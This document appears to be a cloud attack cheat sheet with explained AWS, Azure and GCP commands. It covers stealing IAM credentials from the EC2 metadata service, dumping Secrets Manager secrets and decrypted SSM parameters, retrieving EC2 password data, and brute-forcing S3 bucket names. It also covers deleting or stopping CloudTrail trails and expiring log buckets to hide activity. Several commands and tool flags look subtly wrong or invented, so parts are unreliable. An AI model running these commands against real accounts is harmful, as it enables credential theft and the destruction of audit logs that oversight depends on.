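The jq state filter used in all three cloud variants can be replicated locally. The instance records below are invented; note that the AWS query above also excludes "running", so only transitional states survive:

```python
# Sketch of the jq select(...) chain over describe-instances output.
# The instance data is fabricated for illustration.
reservations = {
    "Reservations": [
        {"Instances": [
            {"InstanceId": "i-0aaa", "State": {"Name": "running"}},
            {"InstanceId": "i-0bbb", "State": {"Name": "pending"}},
            {"InstanceId": "i-0ccc", "State": {"Name": "terminated"}},
        ]}
    ]
}

# States the jq query excludes; because "running" is excluded too,
# only transitional states (e.g. "pending") remain.
excluded = {"terminated", "shutting-down", "stopping", "stopped", "running"}

selected = [
    inst
    for res in reservations["Reservations"]
    for inst in res["Instances"]
    if inst["State"]["Name"] not in excluded
]
```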

Shared Technology Vulnerabilities

   
  • nmap -p0-65535: This command starts the nmap tool with the specified options to scan all ports from 0 to 65535 on the target system.
  • --script vulners,vulscan: This option instructs nmap to use the vulners and vulscan scripts for vulnerability scanning. These scripts are part of the Nmap Scripting Engine (NSE) and help identify potential vulnerabilities in the target system.
  • --script-args vulscanoutput=gnmap: This option specifies additional arguments for the selected scripts. In this case, it sets the vulscanoutput argument to gnmap, which specifies the output format for the vulscan script as gnmap.
  • -oN -: This option redirects the output of the nmap command to the standard output (stdout) instead of saving it to a file.
  • <target>: This is a placeholder for the target IP address or hostname. The actual target should be provided in place of <target>.
  • grep -iE "(shared technology|underlying infrastructure|hypervisor)": This command pipes the output of the nmap command into grep to search for lines that match the specified extended regular expression (-E). The regular expression pattern searches for occurrences of the keywords “shared technology,” “underlying infrastructure,” or “hypervisor” in a case-insensitive manner (-i option).
   
  1. java -jar burpsuite_pro.jar --project-file=<project_file> --unpause-spider-and-scanner --scan-checks --results-dir=<output_directory>: This command executes the Burp Suite Professional edition by running the JAR file (burpsuite_pro.jar) using Java. The --project-file option specifies the path to a Burp Suite project file, which contains configuration settings and previous scan results. The --unpause-spider-and-scanner option unpauses the spider and scanner modules to start the crawling and vulnerability scanning process. The --scan-checks option enables all active scanning checks. The --results-dir option specifies the directory where the scan results will be saved.
  2. grep -iE "(shared technology|underlying infrastructure|hypervisor)" <output_directory>/*.xml: This command uses grep to search for lines that match the specified extended regular expression (-E) within XML files in the specified output directory. The regular expression pattern searches for occurrences of the keywords “shared technology,” “underlying infrastructure,” or “hypervisor” in a case-insensitive manner (-i option).
   
  1. omp -u <username> -w <password> --xml="<get_results task_id='<task_id>'/>": This command uses the OpenVAS Management Protocol (OMP) tool to retrieve scan results. The -u option specifies the username, -w option specifies the password, and --xml option specifies the XML command to send to the OpenVAS server. The <get_results task_id='<task_id>'/> XML command requests the scan results for a specific task ID.
  2. grep -iE "(shared technology|underlying infrastructure|hypervisor)": This command uses grep to search for lines that match the specified extended regular expression (-E). The regular expression pattern searches for occurrences of the keywords “shared technology,” “underlying infrastructure,” or “hypervisor” within the output obtained from the previous command. The -i option enables case-insensitive matching.
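Since the nmap command above sets vulscanoutput=gnmap, the scan results arrive in gnmap's one-line-per-host format. A minimal parser for the open ports in such a line might look as follows (the sample line is fabricated):

```python
import re

# A fabricated line in nmap's gnmap output format, for illustration only.
gnmap_line = "Host: 10.0.0.5 ()\tPorts: 22/open/tcp//ssh///, 443/open/tcp//https///"

def open_ports(line):
    """Extract port numbers marked open from a gnmap 'Ports:' field."""
    return [int(m.group(1)) for m in re.finditer(r"(\d+)/open/", line)]

ports = open_ports(gnmap_line)
```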

Account Hijacking and Abuse

   
  1. aws iam list-users: This command uses the AWS CLI (aws) to list all IAM users in the AWS account by executing the iam list-users API call. It retrieves information about the IAM users.
  2. jq -r '.Users[] | select(.PasswordLastUsed == null)': This command uses jq to filter and manipulate the JSON output obtained from the previous command. The provided query selects IAM users that have a PasswordLastUsed value equal to null, indicating that they have never used a password to authenticate.
  3. grep -iE "(account hijacking|credential compromise|privilege misuse)": This command uses grep to search for lines that match the specified extended regular expression (-E). The regular expression pattern searches for occurrences of the keywords “account hijacking,” “credential compromise,” or “privilege misuse” within the output obtained from the previous command. The -i option enables case-insensitive matching.
   
  1. az ad user list --output json: This command uses the Azure CLI (az) to list all Azure Active Directory (AD) users in the current directory by executing the ad user list command. The --output json option specifies the output format as JSON.
  2. jq '.[] | select(.passwordLastChanged == null)': This command uses jq to filter and manipulate the JSON output obtained from the previous command. The provided query selects AD users that have a passwordLastChanged value equal to null, indicating that they have never changed their password.
  3. grep -iE "(account hijacking|credential compromise|privilege misuse)": This command uses grep to search for lines that match the specified extended regular expression (-E). The regular expression pattern searches for occurrences of the keywords “account hijacking,” “credential compromise,” or “privilege misuse” within the output obtained from the previous command. The -i option enables case-insensitive matching.
   
  1. gcloud auth list --format=json: This command uses the Google Cloud SDK (gcloud) to list all authenticated accounts in the current configuration. The --format=json option specifies the output format as JSON.
  2. jq -r '.[] | select(.status == "ACTIVE") | select(.credential_last_refreshed_time.seconds == null)': This command uses jq to filter and manipulate the JSON output obtained from the previous command. The provided query selects authenticated accounts that have an “ACTIVE” status and a credential_last_refreshed_time.seconds value equal to null, indicating that their credentials have not been refreshed.
  3. grep -iE "(account hijacking|credential compromise|privilege misuse)": This command uses grep to search for lines that match the specified extended regular expression (-E). The regular expression pattern searches for occurrences of the keywords “account hijacking,” “credential compromise,” or “privilege misuse” within the output obtained from the previous command. The -i option enables case-insensitive matching.
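The null-check jq performs in the AWS variant can be sketched in plain Python; the user records are invented. Using `.get()` also covers the case where AWS omits the PasswordLastUsed key entirely for users who never signed in:

```python
# Sketch of jq: .Users[] | select(.PasswordLastUsed == null)
# The user records below are fabricated for illustration.
users = {
    "Users": [
        {"UserName": "alice", "PasswordLastUsed": "2023-11-01T10:00:00Z"},
        {"UserName": "svc-backup", "PasswordLastUsed": None},
        {"UserName": "ci-bot"},  # key absent: never used a password
    ]
}

# .get() treats a missing key the same as an explicit null.
never_logged_in = [u for u in users["Users"] if u.get("PasswordLastUsed") is None]
```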

Retrieve EC2 Password Data

   
  1. aws ec2 describe-instances --query 'Reservations[].Instances[].{InstanceId: InstanceId, State: State.Name, PasswordData: PasswordData}': This command uses the AWS CLI (aws) to describe EC2 instances in the AWS account. The --query option specifies a custom query to retrieve specific attributes for each instance, including the instance ID, state, and password data.
  2. jq -r '.[] | select(.State == "running") | select(.PasswordData != null) | {InstanceId: .InstanceId, PasswordData: .PasswordData}': This command uses jq to filter and manipulate the JSON output obtained from the previous command. The provided query selects EC2 instances that are in the “running” state and have non-null password data. It constructs a new JSON object containing the instance ID and password data.
  3. grep -i "RDP": This command uses grep to search for lines that contain the case-insensitive string “RDP” within the output obtained from the previous command. It filters the output to show only instances where the password data indicates the presence of RDP (Remote Desktop Protocol) configuration.
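The two jq select conditions in this pipeline — running state and non-null password data — can be demonstrated offline with fabricated records:

```python
# Sketch of the jq selection over the custom --query output; data is fabricated.
instances = [
    {"InstanceId": "i-0aaa", "State": "running", "PasswordData": "enc-blob=="},
    {"InstanceId": "i-0bbb", "State": "running", "PasswordData": None},
    {"InstanceId": "i-0ccc", "State": "stopped", "PasswordData": "enc-blob=="},
]

# Keep running instances that actually returned password data,
# and rebuild the reduced object jq constructs.
with_passwords = [
    {"InstanceId": i["InstanceId"], "PasswordData": i["PasswordData"]}
    for i in instances
    if i["State"] == "running" and i["PasswordData"] is not None
]
```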
   
  1. python cloudmapper.py --account <account_name> collect --regions <region1,region2>: This command runs the cloudmapper.py script to collect AWS account data for the specified <account_name> in the specified regions (<region1,region2>). It gathers information about the account’s resources and configurations.
  2. python cloudmapper.py --account <account_name> enum --services ec2 --region <region1,region2>: This command runs the cloudmapper.py script to perform enumeration on the specified AWS account (<account_name>) and target the EC2 service in the specified regions (<region1,region2>). It focuses on gathering information specifically related to EC2 instances.
  3. jq -r '.EC2[] | select(.password_data != null) | {InstanceId: .instance_id, PasswordData: .password_data}': This command uses jq to filter and manipulate the JSON output obtained from the previous command. The provided query selects EC2 instances that have non-null password_data and constructs a new JSON object containing the instance ID and password data.
  4. grep -i "RDP": This command uses grep to search for lines that contain the case-insensitive string “RDP” within the output obtained from the previous command. It filters the output to show only instances where the password data indicates the presence of RDP (Remote Desktop Protocol) configuration.
   
  1. python pacu.py: This command executes the pacu.py script, which is the main entry point for the PACU tool. It launches PACU and allows you to perform various AWS security testing and exploitation tasks.
  2. --no-update: This option disables automatic updating of the PACU tool to ensure that the current version is used without checking for updates.
  3. --profile <profile_name>: This option specifies the AWS profile to use for authentication and authorization. The <profile_name> should correspond to a configured AWS profile containing valid credentials.
  4. --module ec2__get_password_data: This option specifies the specific PACU module to run. In this case, it runs the ec2__get_password_data module, which retrieves password data for EC2 instances.
  5. --regions <region1,region2>: This option specifies the AWS regions to target. The <region1,region2> values represent a comma-separated list of regions where the ec2__get_password_data module will be executed.
  6. --identifier "RDP": This option configures an identifier for the module. In this case, the identifier is set as “RDP”, indicating that the module will search for EC2 instances with password data related to RDP (Remote Desktop Protocol).
  7. --json: This option instructs PACU to output the results in JSON format.
  8. | grep -i "RDP": This part of the command uses grep to search for lines that contain the case-insensitive string “RDP” within the JSON output generated by PACU. It filters the output to show only instances where the password data indicates the presence of RDP configuration.

Steal EC2 Instance Credentials

   
  1. curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/: This command sends an HTTP GET request to the specified URL, which is the metadata service endpoint on an EC2 instance. It retrieves a list of available IAM security credentials.
  2. xargs -I {} curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/{} | jq -r '.AccessKeyId, .SecretAccessKey, .Token': This command uses xargs to process each item (IAM security credential) from the previous command and substitute it into the subsequent command.
    a. curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/{}: This command sends an HTTP GET request to retrieve the metadata of a specific IAM security credential.
    b. jq -r '.AccessKeyId, .SecretAccessKey, .Token': This command uses jq to parse the JSON output obtained from the previous command and extract specific fields, namely AccessKeyId, SecretAccessKey, and Token. The -r option outputs the results in raw (non-quoted) format.
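The two-step IMDS walk — list role names, then fetch each role's credential document — can be sketched offline. Here fetch() fakes the metadata service so the parsing logic is shown without a live instance; all values are illustrative:

```python
import json

# Fake metadata-service responses, keyed by path (illustrative values only).
FAKE_IMDS = {
    "/latest/meta-data/iam/security-credentials/": "MyInstanceRole",
    "/latest/meta-data/iam/security-credentials/MyInstanceRole": json.dumps(
        {"AccessKeyId": "ASIAEXAMPLE", "SecretAccessKey": "secret", "Token": "token"}
    ),
}

def fetch(path):
    # Stand-in for: curl -s http://169.254.169.254<path>
    return FAKE_IMDS[path]

base = "/latest/meta-data/iam/security-credentials/"
creds = {}
for role in fetch(base).splitlines():       # step 1: list attached role names
    doc = json.loads(fetch(base + role))    # step 2: fetch that role's credentials
    creds[role] = (doc["AccessKeyId"], doc["SecretAccessKey"], doc["Token"])
```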
   
  1. imds-helper http://169.254.169.254/latest/meta-data/iam/security-credentials/: This command executes the imds-helper tool with the specified URL as the argument. The tool interacts with the metadata service to retrieve information about IAM security credentials.
  2. grep -E "AccessKeyId|SecretAccessKey|Token": This command uses grep with the -E option to perform a pattern match using an extended regular expression. It filters the output of the imds-helper command and displays only lines that contain the specified patterns: “AccessKeyId”, “SecretAccessKey”, or “Token”.
   
  1. python pacu.py: This command executes the pacu.py script, which is the main entry point for the PACU tool. It launches PACU and allows you to perform various AWS security testing and exploitation tasks.
  2. --no-update: This option disables automatic updating of the PACU tool to ensure that the current version is used without checking for updates.
  3. --profile <profile_name>: This option specifies the AWS profile to use for authentication and authorization. The <profile_name> should correspond to a configured AWS profile containing valid credentials.
  4. --module imds__gather_credentials: This option specifies the specific PACU module to run. In this case, it runs the imds__gather_credentials module, which collects IAM security credentials from the instance metadata service.
  5. --json: This option instructs PACU to output the results in JSON format.
  6. | grep -E "AccessKeyId|SecretAccessKey|Token": This part of the command uses grep with the -E option to perform a pattern match using an extended regular expression. It filters the JSON output generated by PACU and displays only lines that contain the specified patterns: “AccessKeyId”, “SecretAccessKey”, or “Token”.

Retrieve a High Number of Secrets Manager secrets

   
  1. ccat: This command executes the ccat tool, which is used to syntax-highlight and display the contents of files or outputs in the terminal.
  2. secretsmanager get-secret-value <secret_name>: This command specifies the AWS Secrets Manager operation to retrieve the value of a secret with the specified <secret_name>. The <secret_name> should correspond to the name or ARN (Amazon Resource Name) of the secret stored in AWS Secrets Manager.
   
  1. aws secretsmanager list-secrets --query 'SecretList[].Name': This AWS CLI command lists the names of secrets stored in AWS Secrets Manager. The --query parameter specifies the JSON path expression to retrieve only the Name field of each secret.
  2. jq -r '.[]': This jq command reads the JSON output from the previous command and extracts the values of the Name field. The -r option outputs the results in raw (non-quoted) format.
  3. xargs -I {} aws secretsmanager get-secret-value --secret-id {}: This command uses xargs to process each secret name from the previous jq command and substitute it into the subsequent AWS CLI command. It retrieves the value of each secret by calling aws secretsmanager get-secret-value with the --secret-id parameter set to the current secret name.
  4. jq -r '.SecretString': This jq command reads the JSON output from the previous AWS CLI command and extracts the value of the SecretString field. The -r option outputs the result in raw (non-quoted) format.
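The list-then-get loop above can be sketched offline in Python, with the two CLI calls faked so the jq extractions are visible; secret names and values are fabricated:

```python
import json

# Stand-in for: aws secretsmanager list-secrets --query 'SecretList[].Name'
list_output = json.dumps(["prod/db-password", "prod/api-key"])

def get_secret_value(secret_id):
    # Stand-in for: aws secretsmanager get-secret-value --secret-id <id>
    fake = {"prod/db-password": "hunter2", "prod/api-key": "abc123"}
    return json.dumps({"SecretString": fake[secret_id]})

# jq -r '.[]'  -> names; xargs loop -> one get per name; jq -r '.SecretString'
names = json.loads(list_output)
values = {name: json.loads(get_secret_value(name))["SecretString"] for name in names}
```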
   
  1. cf s3ls: This command is specific to the CloudFuzzer (CF) tool. It is used to list the objects within an Amazon S3 bucket.
  2. <bucket_name>: This parameter specifies the name of the S3 bucket for which you want to list the objects. Replace <bucket_name> with the actual name of the bucket you want to query.
   
  1. s3bucketbrute --bucket-prefixes <prefix_list> --region <region>: This command executes the s3bucketbrute tool, which is used for brute forcing or guessing the names of Amazon S3 buckets. The --bucket-prefixes option specifies a list of bucket name prefixes to use in the brute force search, and the --region option specifies the AWS region where the buckets should be searched.
  2. jq -r '.[].Name': This jq command reads the JSON output from the previous command and extracts the values of the Name field for each discovered S3 bucket. The -r option outputs the results in raw (non-quoted) format.
  3. xargs -I {} aws secretsmanager get-secret-value --secret-id {}: This command uses xargs to process each bucket name from the previous jq command and substitute it into the subsequent AWS CLI command. It retrieves the value of the secret associated with each bucket by calling aws secretsmanager get-secret-value with the --secret-id parameter set to the current bucket name.
   
  1. python cloudmapper.py --account <account_name> collect --regions <region1,region2>: This command executes the CloudMapper tool and instructs it to collect information about the specified AWS account (<account_name>) in the specified regions (<region1,region2>). The collect command gathers data about the account’s resources and configurations.
  2. &&: This operator allows the subsequent command to be executed only if the previous command (python cloudmapper.py --account <account_name> collect --regions <region1,region2>) completes successfully.
  3. python cloudmapper.py --account <account_name> enum --services secretsmanager --region <region1,region2>: This command continues the execution of CloudMapper and instructs it to enumerate secrets stored in AWS Secrets Manager for the specified account and regions. The enum command focuses on the specified service (secretsmanager) and retrieves relevant information.
  4. jq -r '.SecretsManager[] | {SecretId: .arn}': This jq command processes the JSON output from the previous CloudMapper command and extracts the SecretId (ARN) of each secret stored in AWS Secrets Manager. The -r option outputs the results in raw (non-quoted) format.
  5. xargs -I {} aws secretsmanager get-secret-value --secret-id {}: This command uses xargs to process each secret ARN obtained from the previous jq command and substitute it into the subsequent AWS CLI command. It retrieves the value of each secret by calling aws secretsmanager get-secret-value with the --secret-id parameter set to the current secret ARN.

Retrieve And Decrypt SSM Parameters

   
  1. aws ssm describe-parameters --query 'Parameters[].Name': This AWS CLI command retrieves a list of parameter names from the SSM Parameter Store using the describe-parameters operation. The --query parameter specifies the JSON query to extract the Name field from the response.
  2. jq -r '.[]': This jq command processes the JSON output from the previous command and extracts the values of the Name field for each parameter. The -r option outputs the results in raw (non-quoted) format.
  3. xargs -I {} aws ssm get-parameter --name {} --with-decryption: This command uses xargs to process each parameter name from the previous jq command and substitute it into the subsequent AWS CLI command. It retrieves the value of each parameter by calling aws ssm get-parameter with the --name parameter set to the current parameter name. The --with-decryption option is used to retrieve decrypted values if the parameter is encrypted.
  4. jq -r '.Parameter.Value': This jq command processes the JSON output from the previous aws ssm get-parameter command and extracts the value of the parameter. The -r option outputs the result in raw (non-quoted) format.
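The describe/get loop follows the same shape as the Secrets Manager pipeline; a minimal offline sketch with faked CLI responses (parameter names and values are invented):

```python
import json

# Stand-in for: aws ssm describe-parameters --query 'Parameters[].Name'
describe_output = json.dumps(["/app/db_url", "/app/db_pass"])

def get_parameter(name):
    # Stand-in for: aws ssm get-parameter --name <name> --with-decryption
    fake = {"/app/db_url": "postgres://db", "/app/db_pass": "s3cret"}
    return json.dumps({"Parameter": {"Name": name, "Value": fake[name]}})

params = {
    name: json.loads(get_parameter(name))["Parameter"]["Value"]  # jq -r '.Parameter.Value'
    for name in json.loads(describe_output)
}
```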
   
  1. imds-helper http://169.254.169.254/latest/meta-data/iam/security-credentials/: This command makes a request to the IMDS endpoint (http://169.254.169.254/latest/meta-data/iam/security-credentials/) to retrieve the security credentials associated with the IAM role assigned to the EC2 instance. The imds-helper tool facilitates the interaction with the IMDS.
  2. jq -r '.[]': This jq command processes the JSON response from the previous command and extracts the values of all fields. The -r option outputs the results in raw (non-quoted) format.
  3. xargs -I {}: This command sets up a placeholder {} that will be replaced with each value from the previous jq command.
   
  1. imds-helper http://169.254.169.254/latest/meta-data/iam/security-credentials/{}: This command uses imds-helper to make a request to the Instance Metadata Service (IMDS) endpoint with a placeholder {} that will be replaced with a specific IAM role name. It retrieves the security credentials associated with the specified IAM role.
  2. jq -r '.AccessKeyId': This jq command processes the JSON response from the previous command and extracts the AccessKeyId field from it. The -r option outputs the result in raw (non-quoted) format.
  3. xargs -I {} aws sts assume-role --role-arn <role_arn> --role-session-name "bugbounty" --external-id <external_id> --region <region> --profile {}: This command uses xargs to substitute the IAM role name obtained from the previous jq command into the subsequent aws sts assume-role command. It assumes the specified IAM role, generating temporary security credentials for the assumed role. The --role-arn, --role-session-name, --external-id, --region, and --profile options are provided to configure the role assumption.
  4. jq -r '.Credentials.AccessKeyId, .Credentials.SecretAccessKey, .Credentials.SessionToken': This jq command processes the JSON response from the previous aws sts assume-role command and extracts the AccessKeyId, SecretAccessKey, and SessionToken fields from it. The -r option outputs the results in raw (non-quoted) format.
  5. xargs -I {} aws ssm describe-parameters --query 'Parameters[].Name' --region <region> --profile {}: This command uses xargs to substitute the IAM profile name obtained from the previous jq command into the subsequent aws ssm describe-parameters command. It retrieves a list of parameter names from AWS SSM Parameter Store. The --query, --region, and --profile options are provided to configure the command.
  6. jq -r '.[]': This jq command processes the JSON response from the previous aws ssm describe-parameters command and extracts the values of the parameter names. The -r option outputs the results in raw (non-quoted) format.
  7. xargs -I {} aws ssm get-parameter --name {} --with-decryption --region <region> --profile {}: This command uses xargs to substitute each parameter name obtained from the previous jq command into the subsequent aws ssm get-parameter command. It retrieves the values of each parameter from AWS SSM Parameter Store. The --name, --with-decryption, --region, and --profile options are provided to configure the command.
  8. jq -r '.Parameter.Value': This jq command processes the JSON response from the previous aws ssm get-parameter command and extracts the values of the parameters. The -r option outputs the results in raw (non-quoted) format.

Delete CloudTrail Trail

   
  1. aws cloudtrail delete-trail: This command is part of the AWS Command Line Interface (CLI) and is used to delete a CloudTrail trail.
  2. --name <trail_name>: This option specifies the name of the CloudTrail trail to be deleted. Replace <trail_name> with the actual name of the trail you want to delete.
  3. --region <region>: This option specifies the AWS region where the CloudTrail trail is located. Replace <region> with the appropriate AWS region code (e.g., us-west-2, eu-central-1, etc.) where the trail exists.
   

By running ccat cloudtrail, the command will attempt to format and enhance the display of CloudTrail log files for better readability. It may apply syntax highlighting, indentation, or other visual enhancements to make the log content easier to analyze and interpret. This can be particularly useful when working with large or complex CloudTrail logs, as it helps highlight key information and improve overall readability.

   
  1. python: This command is used to execute Python code from the command line.
  2. -c "<code>": This option allows you to pass a string of Python code directly on the command line.
  3. "import boto3; boto3.client('cloudtrail').delete_trail(Name='<trail_name>', RegionName='<region>')": This is the Python code being executed. It performs the following steps:
    • Imports the boto3 library, which is the AWS SDK for Python.
    • Uses the boto3.client('cloudtrail') method to create a client object for interacting with the AWS CloudTrail service.
    • Calls the delete_trail() method on the CloudTrail client, passing the Name and RegionName parameters.
    • Replace <trail_name> with the actual name of the CloudTrail trail you want to delete, and <region> with the appropriate AWS region code.
   
  1. terraform init: This command initializes a Terraform working directory by downloading the necessary provider plugins and setting up the environment.
  2. terraform import aws_cloudtrail.this <trail_arn>: This command imports an existing AWS CloudTrail resource into the Terraform state. The <trail_arn> should be replaced with the actual ARN (Amazon Resource Name) of the CloudTrail resource you want to import. By importing the resource, Terraform gains awareness of its existence and configuration.
  3. terraform destroy -auto-approve: This command destroys the infrastructure defined in your Terraform configuration and removes any associated resources. The -auto-approve flag is used to automatically approve the destruction without requiring manual confirmation. This command will delete the CloudTrail resource that was imported in the previous step.

Disable CloudTrail Logging Through Event Selectors

   
  1. aws cloudtrail put-event-selectors: This command is part of the AWS Command Line Interface (CLI) and is used to configure event selectors for an AWS CloudTrail trail.
  2. --trail-name <trail_name>: This option specifies the name of the CloudTrail trail for which you want to configure event selectors. Replace <trail_name> with the actual name of the trail.
  3. --event-selectors '[{"ReadWriteType": "ReadOnly"}]': This option specifies the event selectors to be configured for the CloudTrail trail. In this example, a single event selector is provided as a JSON array with a single object. The "ReadWriteType": "ReadOnly" indicates that the event selector should only capture read-only events. You can customize the event selector based on your specific requirements.
  4. --region <region>: This option specifies the AWS region where the CloudTrail trail is located. Replace <region> with the appropriate AWS region code (e.g., us-west-2, eu-central-1, etc.) where the trail exists.
   
  1. python: This command is used to execute Python code from the command line.
  2. -c "<code>": This option allows you to pass a string of Python code directly on the command line.
  3. "import boto3; boto3.client('cloudtrail').put_event_selectors(TrailName='<trail_name>', EventSelectors=[{'ReadWriteType': 'ReadOnly'}], RegionName='<region>')": This is the Python code being executed. It performs the following steps:
    • Imports the boto3 library, which is the AWS SDK for Python.
    • Uses the boto3.client('cloudtrail') method to create a client object for interacting with the AWS CloudTrail service.
    • Calls the put_event_selectors() method on the CloudTrail client, passing the TrailName, EventSelectors, and RegionName parameters.
    • Replace <trail_name> with the actual name of the CloudTrail trail you want to configure, and <region> with the appropriate AWS region code.
    • The EventSelectors parameter is set as a list with a single dictionary object, specifying the ReadWriteType as ReadOnly. This indicates that the event selector should only capture read-only events. You can customize the event selectors based on your specific requirements.
   
  1. terraform init: This command initializes the Terraform working directory, downloading any necessary provider plugins and setting up the environment.
  2. terraform import aws_cloudtrail.this <trail_arn>: This command imports an existing CloudTrail resource into the Terraform state. The aws_cloudtrail.this refers to the Terraform resource representing the CloudTrail trail, and <trail_arn> is the ARN (Amazon Resource Name) of the CloudTrail trail you want to import. This step allows Terraform to manage the configuration of the existing resource.
  3. terraform apply -auto-approve -var 'event_selector=[{read_write_type="ReadOnly"}]': This command applies the changes specified in the Terraform configuration to provision or update resources. The -auto-approve flag automatically approves the changes without asking for confirmation.
    • The -var 'event_selector=[{read_write_type="ReadOnly"}]' option sets the value of the event_selector variable to configure the event selectors for the CloudTrail trail. In this example, a single event selector is provided as a list with a single dictionary object, specifying the read_write_type as ReadOnly. This indicates that the event selector should only capture read-only events. You can customize the event selectors based on your specific requirements.

CloudTrail Logs Impairment Through S3 Lifecycle Rule

   
  1. aws s3api put-bucket-lifecycle: This command is used to configure the lifecycle policy for an S3 bucket.
  2. --bucket <bucket_name>: Replace <bucket_name> with the actual name of the S3 bucket where you want to configure the lifecycle rule.
  3. --lifecycle-configuration '{"Rules": [{"Status": "Enabled", "Prefix": "", "Expiration": {"Days": 7}}]}': This option specifies the configuration of the lifecycle rule. The configuration is provided as a JSON string. In this example, the configuration includes a single rule with the following properties:
    • Status: Specifies the status of the rule. In this case, it is set to “Enabled” to activate the rule.
    • Prefix: Specifies the prefix to which the rule applies. An empty prefix indicates that the rule applies to all objects in the bucket.
    • Expiration: Specifies the expiration settings for the objects. In this case, the objects will expire after 7 days (Days: 7).
  4. --region <region>: Replace <region> with the appropriate AWS region code where the S3 bucket is located.
   
  1. import boto3: This line imports the Boto3 library, which is the AWS SDK for Python.
  2. s3 = boto3.client('s3'): This line creates a client object for the S3 service using the Boto3 library. This client object allows interaction with the S3 API.
  3. s3.put_bucket_lifecycle_configuration(Bucket='<bucket_name>', LifecycleConfiguration={'Rules': [{'Status': 'Enabled', 'Prefix': '', 'Expiration': {'Days': 7}}]}): This line invokes the put_bucket_lifecycle_configuration method of the S3 client to configure the lifecycle rule for the specified bucket.
    • Bucket='<bucket_name>': Replace <bucket_name> with the actual name of the S3 bucket where you want to configure the lifecycle rule.
    • LifecycleConfiguration={'Rules': [{'Status': 'Enabled', 'Prefix': '', 'Expiration': {'Days': 7}}]}: This argument specifies the configuration of the lifecycle rule. It is provided as a dictionary with a single key, ‘Rules’, which maps to a list of rule dictionaries. In this example, there is a single rule with the following properties:
      • Status: Specifies the status of the rule. In this case, it is set to ‘Enabled’ to activate the rule.
      • Prefix: Specifies the prefix to which the rule applies. An empty prefix indicates that the rule applies to all objects in the bucket.
      • Expiration: Specifies the expiration settings for the objects. In this case, the objects will expire after 7 days (Days: 7).
   
  1. terraform init: This command initializes the Terraform working directory by downloading the necessary provider plugins and setting up the backend.
  2. terraform import aws_s3_bucket.lifecycle <bucket_name>: This command imports an existing S3 bucket into Terraform as a resource. Replace <bucket_name> with the actual name of the S3 bucket you want to import. This step associates the existing bucket with the Terraform configuration.
  3. terraform apply -auto-approve -var 'lifecycle_rule=[{status="Enabled", prefix="", expiration={days=7}}]': This command applies the Terraform configuration, deploying the resources defined in the Terraform files.
    • -auto-approve: This flag automatically approves the proposed changes without requiring manual confirmation.
    • -var 'lifecycle_rule=[{status="Enabled", prefix="", expiration={days=7}}]': This flag sets a variable named lifecycle_rule in the Terraform configuration. It specifies the configuration for the lifecycle rule using a list of one rule object. The rule object has the following properties:
      • status: Specifies the status of the rule. In this case, it is set to “Enabled” to activate the rule.
      • prefix: Specifies the prefix to which the rule applies. An empty prefix indicates that the rule applies to all objects in the bucket.
      • expiration: Specifies the expiration settings for the objects. In this case, the objects will expire after 7 days (days=7).
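The same 7-day expiration rule can be sketched with the current put-bucket-lifecycle-configuration API, which expresses the prefix through a Filter object. The bucket name is a placeholder, and the live call is commented out because it needs credentials:

```shell
BUCKET="example-bucket"   # placeholder bucket name

# One rule, enabled, applying to every object (empty prefix), expiring after 7 days.
LIFECYCLE='{"Rules": [{"ID": "expire-after-7-days", "Status": "Enabled", "Filter": {"Prefix": ""}, "Expiration": {"Days": 7}}]}'

# Live call, shown for reference (requires credentials):
# aws s3api put-bucket-lifecycle-configuration \
#   --bucket "$BUCKET" \
#   --lifecycle-configuration "$LIFECYCLE"

echo "$LIFECYCLE"
```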

Stop Cloud Trail Trail

   
  • --name <trail_name>: Specifies the name of the CloudTrail trail to stop logging. Replace <trail_name> with the actual name of the trail you want to stop logging for.
  • --region <region>: Specifies the AWS region where the CloudTrail trail is located. Replace <region> with the appropriate region identifier, such as us-east-1 or eu-west-2.
   
  1. import boto3: This imports the Boto3 library, which is the AWS SDK for Python.
  2. boto3.client('cloudtrail'): This creates a client object for the CloudTrail service using Boto3.
  3. .stop_logging(Name='<trail_name>'): This invokes the stop_logging method of the CloudTrail client to stop logging for a specific trail.
    • Name='<trail_name>': Specifies the name of the CloudTrail trail to stop logging for. Replace <trail_name> with the actual name of the trail.
    • Note that stop_logging takes no region argument; the region is chosen when the client is created, e.g. boto3.client('cloudtrail', region_name='<region>'), where <region> is an identifier such as us-east-1 or eu-west-2.
   
  1. terraform init: Initializes the Terraform working directory, downloading the necessary provider plugins and modules.
  2. terraform import aws_cloudtrail.this <trail_arn>: Imports the existing CloudTrail resource into the Terraform state. Replace <trail_arn> with the actual ARN (Amazon Resource Name) of the CloudTrail resource you want to manage with Terraform.
  3. terraform apply -auto-approve -var 'enable_logging=false': Applies the Terraform configuration, making changes to the infrastructure. The -auto-approve flag skips the interactive approval step, while the -var flag sets the variable enable_logging to false. This variable is used in the Terraform configuration to control whether CloudTrail logging is enabled or disabled.
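The CLI variant of this technique is a one-liner; a sketch with placeholder trail name and region, with the destructive call left commented:

```shell
TRAIL_NAME="my-trail"   # placeholder
REGION="us-east-1"      # placeholder

CMD="aws cloudtrail stop-logging --name $TRAIL_NAME --region $REGION"
# eval "$CMD"   # requires credentials; stops delivery of new CloudTrail events

# Verification (IsLogging should be false afterwards):
# aws cloudtrail get-trail-status --name "$TRAIL_NAME" --region "$REGION"

echo "$CMD"
```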

Attempt to Leave the AWS Organization

   
  • aws organizations leave-organization: This is the AWS CLI command a member account runs to leave its AWS Organization. It takes no account ID because it always acts on the calling account.
  • aws organizations remove-account-from-organization --account-id <account_id>: Alternatively, this command is run from the organization's management account to remove a member account. Replace <account_id> with the actual ID of the account you want to remove.
  • --region <region>: Specifies the AWS region for the API endpoint. Replace <region> with the appropriate region identifier, such as us-east-1 or eu-west-2.
   
  • import boto3: Imports the Boto3 library, which provides an interface to interact with AWS services.
  • boto3.client('organizations').leave_organization(): Creates a client for the AWS Organizations service using Boto3 and calls the leave_organization method, which removes the calling account from its organization. To remove a different member account from the management account, call remove_account_from_organization(AccountId='<account_id>') instead, replacing <account_id> with the actual ID of the account.
   
  • terraform init: Initializes the Terraform configuration in the current directory.
  • terraform import aws_organizations_account.this <account_id>: Imports an existing AWS account into Terraform. The aws_organizations_account.this resource represents an AWS account in the Terraform configuration, and <account_id> should be replaced with the actual ID of the AWS account you want to manage.
